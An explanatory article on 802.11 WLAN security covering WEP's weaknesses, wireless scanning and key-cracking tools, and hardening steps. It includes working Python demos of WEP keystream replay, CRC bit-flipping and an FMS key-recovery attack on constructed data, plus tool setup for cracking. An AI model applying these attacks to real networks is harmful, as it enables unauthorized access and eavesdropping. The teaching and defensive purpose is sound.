Wireless Local Area Networks (WLANs) are fast becoming popular and are being
deployed in many organizations. Their flexibility and portability let users reach
their files, network resources and the Internet without a cable. A WLAN can be
installed in places where a conventional wired LAN cannot, and it scales easily.
On top of these benefits, increased bandwidth and data rates approaching Ethernet
speed are pushing the growth and popularity of WLANs.
The most commonly used WLANs are based on the IEEE 802.11 family of standards,
the first of which, IEEE 802.11, was published in 1997. IEEE 802.11b was the
first widely used standard; it operates in the 2.4-2.48 GHz band and supports
11 Mbps. Today the most commonly used standards are IEEE 802.11b and 802.11g.
IEEE 802.11 permits devices to form networks around fixed access points (APs) or
as peer-to-peer networks, and so defines two topologies: the infrastructure
network, which extends a wired LAN by giving mobile devices access to its
resources, and the ad hoc network, in which mobile devices communicate directly
with each other.
Security of 802.11 WLANs
IEEE 802.11 defines three basic security services for a WLAN: authentication,
confidentiality and integrity. Authentication can be done in two ways: open
system authentication and shared-key authentication. In open system
authentication the access point does not verify the client's identity at all;
any client that sends an authentication request (identified only by its MAC
address) is accepted, so this mode offers no protection against unauthorized
clients. Shared-key authentication is a cryptographic challenge-response scheme.
The access point generates a random challenge (128 bytes) and sends it to the
mobile device. The mobile device encrypts the challenge with the shared WEP key
and sends the result back. The access point decrypts the response, compares it
with the challenge it sent and grants access only if the two are the same.
Note that this exchange hands an eavesdropper a known plaintext (the challenge)
together with its ciphertext (the response); XORing the two yields the RC4
keystream for that IV, which can then be replayed to answer any later challenge
without knowing the key. Shared-key authentication is therefore, in practice,
weaker than open system authentication combined with encryption of the data.
Confidentiality (privacy) is achieved by encrypting the data itself. WEP (Wired
Equivalent Privacy), for example, uses the RC4 symmetric stream cipher: for each
frame a 24-bit initialization vector (IV) is prepended to the shared key, RC4
generates a keystream from IV and key, and the keystream is XORed with the
plaintext. The IV is sent in the clear, so any reuse of an IV reuses the
keystream.
Finally, integrity is provided by a simple Cyclic Redundancy Check (CRC): a
CRC-32 integrity check value (ICV) is computed over each data packet before
transmission and encrypted along with it. At the receiver the CRC is recomputed
and compared with the received value; if they do not match the message is
declared modified. Because CRC-32 is linear, however, an attacker who flips
bits in the ciphertext can compute the matching change to the encrypted ICV
without knowing the key, so the check catches transmission errors but not
deliberate tampering.
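The following is an added example, not code from the article: a WEP-style frame protection built from a stream-cipher keystream and a CRC-32 ICV, used to show the two weaknesses just described, namely that a shared-key authentication exchange leaks keystream that can be replayed, and that CRC-32 is linear so ciphertext bits can be flipped and the ICV patched without the key. The keystream function is a stand-in for RC4 (an assumption; any stream cipher keyed on IV||key behaves the same way in these two attacks), and the key, IV, challenges and payload are constructed for the demo.

```python
"""WEP-style protection: IV || (plaintext || CRC-32 ICV) XOR keystream.
Added example; the keystream is a stand-in for RC4 output (assumption)."""
import hashlib
import os
import struct
import zlib


def keystream(key: bytes, iv: bytes, n: int) -> bytes:
    # Stand-in for RC4 PRGA output: deterministic in (iv, key), so the same IV
    # with the same key always yields the same keystream, exactly as in WEP.
    out = b""
    counter = 0
    while len(out) < n:
        out += hashlib.sha256(iv + key + counter.to_bytes(4, "big")).digest()
        counter += 1
    return out[:n]


def icv(data: bytes) -> bytes:
    # WEP's integrity check value: CRC-32 of the plaintext, little-endian.
    return struct.pack("<I", zlib.crc32(data) & 0xFFFFFFFF)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    # Frame body = IV (in the clear) || (plaintext || ICV) XOR keystream
    body = plaintext + icv(plaintext)
    return iv + xor(body, keystream(key, iv, len(body)))


def wep_decrypt(key: bytes, frame: bytes):
    # Returns the plaintext, or None if the ICV does not match.
    iv, body = frame[:3], frame[3:]
    pt = xor(body, keystream(key, iv, len(body)))
    data, tag = pt[:-4], pt[-4:]
    return data if icv(data) == tag else None


# --- Shared-key authentication: AP challenge, client response, AP check ---
def client_respond(key: bytes, iv: bytes, challenge: bytes) -> bytes:
    return wep_encrypt(key, iv, challenge)


def ap_verify(key: bytes, challenge: bytes, response: bytes) -> bool:
    return wep_decrypt(key, response) == challenge


def recover_keystream(challenge: bytes, response: bytes):
    # Eavesdropper: known plaintext (challenge || ICV) XOR response body
    # gives the keystream for this IV.
    iv, body = response[:3], response[3:]
    return iv, xor(challenge + icv(challenge), body)


def forge_response(iv: bytes, ks: bytes, challenge: bytes) -> bytes:
    # Answer a fresh challenge with the captured keystream; no key needed.
    body = challenge + icv(challenge)
    return iv + xor(body, ks[: len(body)])


# --- Bit flipping: change the plaintext and fix the ICV without the key ---
def flip_bits(frame: bytes, delta: bytes) -> bytes:
    # CRC-32 is affine: crc(p ^ d) == crc(p) ^ crc(d) ^ crc(zeros). The ICV is
    # only XORed with keystream, so XORing that difference into the encrypted
    # ICV keeps it valid for the modified plaintext.
    iv, body = frame[:3], frame[3:]
    data_ct, icv_ct = body[:-4], body[-4:]
    assert len(delta) == len(data_ct)
    zeros = bytes(len(delta))
    crc_delta = (zlib.crc32(delta) ^ zlib.crc32(zeros)) & 0xFFFFFFFF
    return iv + xor(data_ct, delta) + xor(icv_ct, struct.pack("<I", crc_delta))


if __name__ == "__main__":
    key = os.urandom(5)            # constructed 40-bit WEP key for the demo
    iv = b"\x00\x00\x01"
    challenge = os.urandom(128)    # constructed AP challenge
    response = client_respond(key, iv, challenge)
    print("legitimate auth accepted:", ap_verify(key, challenge, response))
    seen_iv, ks = recover_keystream(challenge, response)
    new_challenge = os.urandom(128)
    forged = forge_response(seen_iv, ks, new_challenge)
    print("forged auth without key accepted:", ap_verify(key, new_challenge, forged))
    frame = wep_encrypt(key, iv, b"PAY 00010 TO BOB")
    delta = xor(b"PAY 00010 TO BOB", b"PAY 99910 TO BOB")
    print("tampered frame decrypts to:", wep_decrypt(key, flip_bits(frame, delta)))
```

Both attacks work because the receiver checks only the ICV, which protects against noise, not against an adversary; a keyed message authentication code (as used by WPA's Michael and WPA2's CCMP) is what the integrity service actually needs.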
Tools to identify vulnerabilities in a WLAN
Here we discuss various tools that expose loopholes in WLAN security. We start
with commonly used software that detects wireless signals, then try software
that can crack WEP, the most commonly used protection. One of the best sources
of these tools is BackTrack 2, an open source Linux live distribution widely
used for penetration testing, which ships with many preconfigured tools for
monitoring wireless networks and cracking WEP keys.
Figure: Graph of traffic in NetStumbler, with time and day on the x-axis and signal-to-noise ratio on the y-axis. The left pane lists SSIDs and channels, with filtering criteria at the bottom.
NetStumbler
NetStumbler is a free tool for Windows that detects wireless networks (WLANs)
using the 802.11a, 802.11b and 802.11g standards. It can be downloaded from the
URL given and installation is simple. The only issue one may face is
compatibility with the wireless card, its firmware and driver versions and the
operating system; a list of tried and tested configurations is kept at
www.stumbler.net/compat/. NetStumbler runs on Windows 2000, Windows XP or later.
The NetStumbler interface is easy to understand: clicking the scan button
detects all WLANs in the vicinity and lists valuable information such as MAC
address (BSSID), SSID, channel and speed. Note that NetStumbler is an active
scanner, sending probe requests rather than only listening, so a wireless IDS
can detect it. A malicious user can turn the information it collects against
the WLAN, for example by jamming the (now known) channel with a frequency
jammer, or by sniffing packets on that channel to break the encryption.
Kismet
Kismet is a free tool that can be used as a WLAN detector, packet sniffer and
intrusion detection system. It can sniff 802.11a, 802.11b, 802.11g and 802.11n
traffic with any card that supports raw monitor mode. The tool can be
downloaded from the URL given, or installed on Linux with
# yum install kismet
To configure it, open 'kismet.conf' in the '/etc/kismet' folder, find the line
'source=none,none,addme' and change it to, for example,
'source=orinoco,eth1,root'; the first field is the source type (the driver),
the second the interface and the third an arbitrary name for the capture
source (it is a label, not a user name). To run it just enter
# kismet
at the terminal. Alternatively use BackTrack 2, a Linux operating system with
Kismet preconfigured (the option we used). Once Kismet is running, pressing the
'h' key brings up the help menu from which it can be customized further.
Figure: Kismet lists all the WLAN signals in the vicinity together with the size of the data packets transferred, the IP range and the transmission channel.
Figure: The AirSnort interface shows the packets captured and the BSSID. A specific channel can be selected with 'channel'; traffic of other WLANs can be scanned by selecting 'scan'.
With the help of this tool you can view all the APs around you, so a malicious
user can use it as an AP detector.
AirSnort
Now we cover tools that can go further and crack encryption keys. These pose a
greater threat to WLAN security, because once the key is known everything sent
on the network can be read. AirSnort is a tool for recovering the WEP key. It
passively monitors wireless traffic and cracks the key once it has collected
enough packets. It can be downloaded from the web site given; for testing we
again used BackTrack 2, which has AirSnort preconfigured. AirSnort is also
available for Windows, and Linux users can install it with
# yum install airsnort
Once installed, AirSnort's simple interface needs a little configuration. Check
the channel radio button to monitor packets on a specific channel. 'Network
device' is chosen according to the hardware, and 'Driver type' tells AirSnort
how to put the card into monitoring mode. One more important setting is 'crack
breadth', which should be set to the maximum: it defines how many candidate
values the tool tries for each key byte when the votes from weak packets are
not decisive. AirSnort needs roughly 5-10 million captured packets to recover
a key. It exploits the statistical weakness of WEP's RC4 key scheduling in the
802.11 standard (the Fluhrer, Mantin and Shamir attack, in which 'weak' IVs
each leak a key byte with about 5% probability); later attacks such as PTW,
implemented in aircrack-ng, need far fewer packets, so a 128-bit key is no
safer than a 64-bit one against a patient attacker.
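The following is an added example, not AirSnort's own code: a small simulation of the Fluhrer, Mantin and Shamir (FMS) weak-IV attack that AirSnort's key recovery is based on. Frames are generated with 'weak' IVs of the form (B+3, 0xFF, X); the first keystream byte of each frame is known because every WEP data payload starts with the LLC/SNAP byte 0xAA. Each resolved weak IV votes for key byte B with about 5% probability, so with 256 such IVs per key byte the right value wins the vote, which is the same statistic AirSnort gathers from millions of packets in real traffic (only a small fraction of random IVs are weak). The key, IVs and payload are constructed for the demo.

```python
"""Simulated FMS attack on a 40-bit WEP key (added example, not AirSnort code)."""
import struct
import zlib

SNAP_FIRST_BYTE = 0xAA  # every WEP-protected data payload starts with LLC/SNAP


def rc4_ksa(key: bytes, steps: int = 256):
    # Key-scheduling algorithm, optionally stopped after `steps` rounds so the
    # attacker can reproduce the partial state that depends only on the IV and
    # the key bytes recovered so far.
    S = list(range(256))
    j = 0
    for i in range(steps):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    return S, j


def rc4(key: bytes, data: bytes) -> bytes:
    # Full KSA followed by the PRGA, XORed with the data.
    S, _ = rc4_ksa(key)
    i = j = 0
    out = bytearray()
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def wep_frame(key: bytes, iv: bytes, payload: bytes) -> bytes:
    # IV in the clear, then RC4(IV || key) over payload || CRC-32 ICV.
    body = payload + struct.pack("<I", zlib.crc32(payload) & 0xFFFFFFFF)
    return iv + rc4(iv + key, body)


def capture_weak_iv_frames(key: bytes):
    # Constructed "capture": for each key byte B, one frame per X in 0..255
    # with IV (B+3, 0xFF, X), carrying a SNAP header like a real data frame.
    frames = []
    for b in range(len(key)):
        for x in range(256):
            iv = bytes([b + 3, 0xFF, x])
            frames.append(wep_frame(key, iv, b"\xaa\xaa\x03\x00\x00\x00\x08\x00"))
    return frames


def fms_vote(iv: bytes, first_ks_byte: int, known_key: bytes):
    # Run the KSA only as far as the attacker can (IV plus recovered bytes).
    # If the state is "resolved", the first keystream byte z reveals the next
    # key byte with ~5% probability:  K[i] = S^-1[z] - j - S[i]  (mod 256).
    partial = iv + known_key
    i = len(partial)
    S, j = rc4_ksa(partial, steps=i)
    if S[1] < i and (S[1] + S[S[1]]) & 0xFF == i:
        return (S.index(first_ks_byte) - j - S[i]) & 0xFF
    return None


def crack_wep_key(frames, key_len: int = 5) -> bytes:
    # Recover the key one byte at a time; each byte's votes use the bytes
    # already recovered, exactly as AirSnort's incremental attack does.
    recovered = b""
    for b in range(key_len):
        votes = [0] * 256
        for frame in frames:
            iv, first_ct = frame[:3], frame[3]
            if iv[0] != b + 3:           # only IVs that target key byte b
                continue
            guess = fms_vote(iv, first_ct ^ SNAP_FIRST_BYTE, recovered)
            if guess is not None:
                votes[guess] += 1
        recovered += bytes([max(range(256), key=votes.__getitem__)])
    return recovered


if __name__ == "__main__":
    key = b"\x1f\x2e\x3d\x4c\x5b"   # constructed 40-bit WEP key
    frames = capture_weak_iv_frames(key)
    print("recovered:", crack_wep_key(frames).hex(), "actual:", key.hex())
```

The same code recovers a 104-bit (13-byte) key by passing key_len=13 and a capture with IVs up to (15, 0xFF, X): the attack cost grows only linearly with key length, which is why the "128-bit" setting does not rescue WEP.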
Wicrawl
Wicrawl is a simple Linux-based AP scanner with a plug-in architecture, which
makes it very versatile: plug-ins performing different tasks can be attached
to it, and they can be implemented as scripts or as externally called programs.
Wicrawl can be downloaded from the URL given. We used BackTrack 2 to test it;
the interface is simple, with an SSID filter at the top for picking out
particular SSIDs. A number of plug-ins are already available, including
'aircrack-wep-cracking' for WEP cracking, 'check_speed', which measures
connection latency, and 'check_internet', which checks for Internet
connectivity. The plug-in architecture makes Wicrawl an ever growing threat to
WLAN security, since new attacks can be added as plug-ins, for example WEP
cracking by several different methods. The 'apwebcrack' plug-in, for instance,
tries to log in to the AP's administration interface using default passwords.
Figure: Wicrawl interface, with the plug-in option in the toolbar used to launch different activities. The SSID filter at the top is for monitoring a specific network.
Figure: Wireshark's interface shows packet movement from source to destination in detail and decodes the contents of each packet.
Wireshark
Wireshark is a network packet analyzer: it captures packets and displays their
contents in detail. It was originally built for Ethernet, but wireless capture
is now integrated. Download it from the URL given; installation is simple. We
tried it on Windows XP Professional and found it easy to use. To start
capturing, click the first button on the toolbar, which lists all the available
interfaces, and click the 'Start' button next to the wireless interface. The
tool also acts as a network detector, listing all the networks seen (click
'Details'). Wireshark decodes IP, TCP, UDP and many other protocols, and capture
and display filters let you pick out a particular kind of packet. Captured
packets can expose critical information: on an open or WEP-protected WLAN
anyone in range can capture the traffic, so confidentiality depends entirely on
the encryption in use.
Making your WLAN more secure
Now we focus on how to make your WLAN more secure. The first major step an
organization using a WLAN can take is to write a security policy defining
access rights, the criticality of information that may be sent over the WLAN
and the security settings of the WLAN equipment.
Proper configuration of the access point is critical for a secure WLAN. Start
by replacing the AP's default password with a strong alphanumeric one known
only to the administrator (the 'apwebcrack' plug-in above exists precisely
because default passwords are so often left in place). Always use the
strongest encryption setting the product (AP) offers: if the available
settings are none, 64-bit shared key and 128-bit shared key, use the last one.
Be aware, though, that 128-bit WEP keys fall to the same statistical attacks as
64-bit keys, so where the AP supports WPA or WPA2 (IEEE 802.11i) use that
instead. One great security loophole is the AP's reset function: it restores
the factory settings and so negates every security setting configured on the
AP. Physically restricting access to the reset button (and to the AP itself)
closes this hole. Change the default SSID and disable the SSID broadcast
feature, remembering that this only hides the network from casual scanners,
since the SSID still appears in the probe and association frames that Kismet
and Wireshark capture. Choose the AP's channel deliberately: channels 1, 6 and
11 do not overlap and can be used simultaneously on closely placed APs, and
moving off a known channel defeats only a jammer fixed to that channel. Static
IP addresses and, where possible, MAC ACLs (access control lists that admit
only listed client MAC addresses) add a further hurdle, although an attacker
who has sniffed a legitimate client's MAC address can spoof it.
Security measures used on a wired LAN also apply to a WLAN: physical protection
of APs and mobile clients, regular monitoring of the networks visible in the
area, and firewalls between the WLAN and the wired network. An IDS (intrusion
detection system) can also be deployed on the WLAN; a WLAN IDS can be host
based or network based (Kismet itself offers basic wireless IDS functions).